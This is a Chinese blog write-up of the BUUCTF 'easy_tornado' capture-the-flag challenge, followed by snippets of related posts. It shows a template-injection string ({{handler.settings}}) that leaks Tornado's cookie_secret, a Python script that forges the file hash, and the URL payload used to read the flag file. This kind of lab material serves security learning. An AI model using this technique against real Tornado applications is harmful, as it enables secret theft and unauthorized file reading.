[护网杯 2018]easy_tornado 1

最新推荐文章于 2024-07-20 17:49:22 发布
最新推荐文章于 2024-07-20 17:49:22 发布
阅读量536 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/dlccom/article/details/124310499
本文讲述了如何通过Tornado框架的cookie_secret找到隐藏文件的MD5校验,揭示了从URL参数到获取cookie_secret再到生成payload的过程,最终成功获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • 打开靶机地址发现三个文件,挨个看一下

  • 隐藏文件给了个md5算法
  • http://d7922331-263c-41d9-9ede-8376b75f8650.node4.buuoj.cn:81/file?filename=/hints.txt&filehash=62b526069e0980a51fd5b8c9fb1ff82a
  • url如上,filename是知道的,cookie_secret是个啥
  • 这里的filehash应该就是md5算法算出来的32位的值,所以要找到cookie_secret,刚开始我以为cookie_secret就是网站的COOKIE,带入公式算了半天跟filehash对不上,那肯定就是错误的。所以去搜了一下tornado框架的cookie_secret,说实话没看懂。
  • 找了别的大神的writeup,大概知道了handler.settings就指向RequestHandler.application.settings
  • cookie_secret这个属性就在RequestHandler.application.settings中,所以通过渲染模板注入拿到cookie_secret
  • 然后写个脚本跑一下拿到filehash
  • 
import sys
import hashlib
cookie="c96e24b8-1db5-418d-9c12-c6fda6232763"
#cookie="cookie_secret"
filename="/fllllllllllllag"
md = hashlib.md5()
md.update(filename.encode('utf-8'))
finename_md=md.hexdigest()
#finename_md=str(finename_md)
#print(type(filename))
a=cookie+finename_md
#md.update((cookie+finename_md).encode('utf-8'))
md = hashlib.md5()
md.update(a.encode('utf-8'))
result_md=md.hexdigest()
print(finename_md)
print(result_md)

  • payload:http://d7922331-263c-41d9-9ede-8376b75f8650.node4.buuoj.cn:81/file?filename=/fllllllllllllag&filehash=0cd54d5313f8e13ae66a2864bb95485f
  • 成功拿flag

咸鱼一方
关注
络安全 | CTF】2018easy_tornado解题详析(Tornado之SSTI注入)
等风来
08-24 5815
提示:filename先被md5加密后,结合cookie_secret,再次被md5加密姿势进入页面给出三个链接:提示:filename先被md5加密后,结合cookie_secret,再次被md5加密先加密filename:得到:3bf9f6cf685a6dd8defadabfb41先加密filename:可知存在模板注入,而Tornado框架的附属文件handler.settings中存在cookie_secret故get传参:/error?msg={{handler.settings}}得到
络安全 | CTF】攻防世界 2018 easy_tornado
等风来
07-23 5491
tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。或一个目录是“/Users/python/tornado-file-read/static_private/”,传入某文件的路径为“/Users/python/tornado-file-read/static/”将得到的cookie_secret同加密的内容一同进行加密。
web buuctf [ 2018]easy_tornado1
weixin_44214568的博客
03-12 4722
分解信息量: 1.题目名称是easy-tornadotornado是python的web框架(web框架的产生是避免程序代码与html编码的编码混乱性,框架将传参过程进行独立) 2.打开一共三个链接,分别点开 /flag.txt 提示内容:flag in /fllllllllllllag ,意思就是flag在文件fllllllllllllag里面,需要考虑怎么进入文件里面 /welcome.txt 提示内容:render,render是tornado里面的渲染函数,就是对web页界面进行编辑的函
BUUCTF---web---[ 2018]easy_tornado1
2201_75556700的博客
03-13 915
3.通过第一个信息可知,flag在文件名为/fllllllllllllag这个里面,第二个信息中的render是渲染函数,第三个个信息中是一个md5加解密,因为filename我们已经知道,所以我们需要找到cookie_secret的值。8.在这三个信息中我们唯一不知道的就是cookie_secert的值,tornado中msg该传什么值才能得到cookie_secert的值,是我们接下来要做的事情,查阅文档之后。6.需要利用msg的值进行传参,在tornado官方文档中提到。2.依次点开文件链接。
[ 2018]easy_tornado1
最新发布
weixin_63920195的博客
07-20 995
当然还是和sql注入有所不同的,SSTI利用的是现在的站模板引擎,主要针对python、php、java的一些站处理框架,比如Python的jinja2 mako tornado django,php的smarty twig,java的jadevelocity。当这些框架对运用渲染函数生成html的时候会出现SSTI的问题。所有handler.settings就指向RequestHandler.application.settings了。SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。
buuojweb刷题wp详解及知识整理—-【easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
[ 2018]easy_tornado WriteUp(超级详细!)
lunan的博客
04-22 4127
[ 2018]easy_tornado   打开题目后,首先发现3个超链接   依次点开三个链接    址里有参数filename和filehash推测这里flag应该是 filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面,filehash里hash就是提示为md5的hash加密。    变量 filename 的值总是为要访问的文件,再根据提示三和 fil
[ 2018]easy_tornado1 刷题记录
kindyyy的博客
10-11 1064
得到cookie_secrect的值,再通过md5加密和脚本计算出md5(cookie_secret+md5(filename)Tornado全称Tornado Web Server,是一个用Python语言写成的Web服务器兼Web应用框架。msg={{2*2}},发现回显orz。查询了一下发现可能存在过滤。因此,构造查询语句:/error?其实这里就已经可以猜测一下,可能和ssti模板注入有关。还得继续加油啊,还有好多注入模板不熟练!(本题考察的是SSTI注入的问题)其实这里没有什么发现,看一下址。
BUUCTF[ 2018]easy_tornado1-write up
m0_62851980的博客
04-23 1198
知识点: SSTI(模板注入),render函数,Tornado框架(知识点在最后) 打开靶机,看到三个链接: 分别点进去: 注意每个链接的url: /file?filename=/xxx&filehash=32位MD5 根据flag.txt和hint.txt提示url的形式为:文件名+32位MD5 再看hint.txt的提示:md5(cookie_secret+md5(filename))。明显我们要先找到cookie_secret进行MD5加密,再和进行MD5加密后输入的文
BUUCTF [ 2018] easy_tornado1
m0_74167420的博客
06-18 828
Handler指向的处理当前这个页面的RequestHandler对象,handler是RequestHandler的别名,而上面又提到RequestHandler.settings是self.application.settings的别名。2、render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的页,如果用户对render内容可控,即可进行SSTI模板注入或者XSS注入。(4)访问出错后出现如下界面,输入{{1}},测试得出存在SSTI模板注入漏洞。
[ 2018]easy_tornado 1(STTI模板注入+Tornado的secret_cookie)
Home to come
08-19 1516
本文为个人刷题记录,不记录完整步骤,主要记录比较有感触的知识点 SSTI注入 参考:SSTI完全学习 SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。 常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。 sql注入是从用户获得一个输入,然后又后端脚本语言
[ 2018]easy_tornado 1(两种解法!)
m0_73734159的博客
11-12 5815
tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。猜测解题关键点在md5(cookie_secret+md5(filename))这里。改哈希值看看是否有变化。
[ 2018]easy_tornado
03-16
2018 中的 easy_tornado 题目是一道Web安全题目。根据题目描述,该站使用了 Tornado 框架搭建,并且存在一个可以进行任意代码执行的漏洞。需要我们利用这个漏洞,在服务器上执行指定的命令。 解决这道题目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值